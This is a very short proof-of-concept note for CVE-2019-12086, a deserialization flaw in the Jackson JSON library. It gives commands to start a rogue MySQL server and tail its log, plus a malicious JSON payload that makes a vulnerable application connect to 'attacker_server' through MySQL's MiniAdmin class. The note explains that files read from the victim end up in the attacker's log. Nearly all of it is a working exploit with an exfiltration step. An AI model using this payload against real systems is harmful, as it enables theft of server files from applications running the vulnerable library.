
jackson unserialize
CVE-2019-12086 jackson unserialize
python rogue_mysql_server.py
tail -f mysql.log
["com.mysql.cj.jdbc.admin.MiniAdmin","jdbc:mysql://attacker_server:port/foo"]
When Jackson deserializes the malicious JSON string, it will connect to the malicious MySQL server, and the contents of the read file will be written to the malicious server's mysql.log.